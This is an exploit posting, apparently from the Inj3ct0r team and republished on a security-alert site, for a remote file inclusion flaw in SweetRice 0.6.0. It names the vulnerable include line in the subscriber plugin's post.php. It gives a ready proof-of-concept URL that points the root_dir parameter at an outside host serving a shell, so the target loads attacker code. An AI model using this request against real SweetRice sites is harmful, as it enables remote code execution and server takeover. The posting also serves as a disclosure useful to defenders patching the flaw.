SweetRice 0.6.0 Remote File Inclusion Vulnerabilities

Exploit Code :

=====================================================
SweetRice 0.6.0 Remote File Inclusion Vulnerabilities
=====================================================

[+] SweetRice 0.6.0 Remote File Inclusion Vulnerabilities

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /' \ __ /'__`\ /\ \__ /'__`\ 0
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
1 \ \____/ >> Exploit database separated by exploit 0
0 \/___/ type (local, remote, DoS, etc.) 1
1 1
0 [+] Site : Inj3ct0r.com 0
1 [+] Support e-mail : submit[at]inj3ct0r.com 1
0 0
1 ########################################## 1
0 I'm bL4Ck_3n91n3 member from Inj3ct0r Team 1
1 ########################################## 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1

[+] Bugs Found: bL4Ck_3n91n3
[+] My id: http://inj3ct0r.com/author/2305
[+] Original : http://inj3ct0r.com/exploits/9701
[+] Download:
http://php.opensourcecms.com/scripts/details.php?scriptid=353&name=SweetRic
e

[x] RFI:
File : sweetrice/_plugin/subscriber/inc/post.php
Line 2 : include_once($root_dir."_plugin/fckeditor/fckeditor.php") ;

[x] RFI PoC:
http://localhost/sweetrice/_plugin/subscriber/inc/post.php?root_dir=http://
shell??

[+] sHoutZ :
- My MoM
- My Dina
- cr4wl3r
- Inj3ct0r.com // r0073r

Security

IT News

Search

SecurityAlert Database

About SecurityAlert

ExploitAlert Database

SecurityReason Research

WLB Database

Send to WLB

About WLB

Security Audit

Schedule

Prices of services

Contact

SecurityReason IT News

SecurityAlert

World Laboratory of Bugtraq

ExploitAlert

Apache

PHP

Contact

About SecurityReason